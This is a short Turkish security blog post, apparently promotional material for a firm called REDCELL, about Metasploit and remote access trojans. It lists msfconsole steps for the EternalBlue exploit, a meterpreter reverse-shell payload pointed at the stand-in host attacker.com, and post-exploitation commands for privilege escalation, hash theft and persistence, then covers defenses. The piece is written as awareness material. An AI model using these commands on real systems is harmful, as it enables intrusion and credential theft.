Metasploit & RAT (Remote Access Trojan): Tam Sistem Kontrolü
Metasploit Framework — Exploit'leri otomatik hale getiren platform. Exploit → reverse shell → sistem kontrolü.
RAT (Remote Access Trojan) Nedir?
Hacker'ın kurbanın bilgisayarında "kapı açması" ve oradan her yerden erişmesi.
Saldırı Zinciri
Adım 1: Exploit seç (Metasploit)
msfconsole search windows/smb use exploit/windows/smb/ms17_010_eternalblue
Adım 2: Payload oluştur (Reverse Shell)
set PAYLOAD windows/meterpreter/reverse_tcp set LHOST attacker.com set LPORT 4444 generate
Payload kurbanın makinede çalışırsa, attacker'a reverse shell veriyor.
Adım 3: Kurbanı enfekte et
Exploit'lenmiş dosya, email attachment, vb.
Adım 4: Sistem Kontrolü
meterpreter > sysinfo # İşletim sistemi, kullanıcı meterpreter > getsystem # Admin olur meterpreter > dump_hashes # Password hash'leri çal meterpreter > persistence # Kalıcı backdoor oluştur
---
🔴 Risk Derecesi: Kritik
Kötü Niyetli Hacker Ne Yapabilirdi?
İlk Girişte:
- Sistem tamamen ele geçirilir
- Admin hakları alınır
- Tüm dosyalara erişim
Persistence (Kalıcılık):
- Başlangıçta autorun script'i ekle
- Registry değiştir (system reboot'da çalışsın)
- Kurban antivirüs silebilir ama malware otomatik restore olur
Lateral Movement:
- Ağ üzerindeki diğer sistemlere sıçra
- Domain controller'a çık (tüm şirket ele geçer)
- Backup sunucularını bul, şifrele (fidye)
---
✅ Koruma
1. Windows Update: Patch'ler düzenli yükle (EternalBlue vs. zafiyetleri kapat)
2. EDR (Endpoint Detection & Response): Metasploit traffiğini tespit et
3. Segmentation: Ağ bölümlendirmesi — bir sistem ele geçerse diğerleri korumalı
4. Monitoring: Sistem logları, process monitorları, ağ traffiğini izle
---
Sonuç
Metasploit, profesyonel pentest tool'u olsa da, saldırganın aynı araçları (public exploit'ler) kullanması kolay. İlk zafiyete karşı sürekli vilalanış gerekli.
🛡️ Sisteminizin güvenliğinden emin misiniz?
Ücretsiz Ön Değerlendirme →Yazıdaki zafiyetlerden etkileniyor olabilirsiniz. REDCELL uzmanları 30 dakikada siber risk analizi yapar.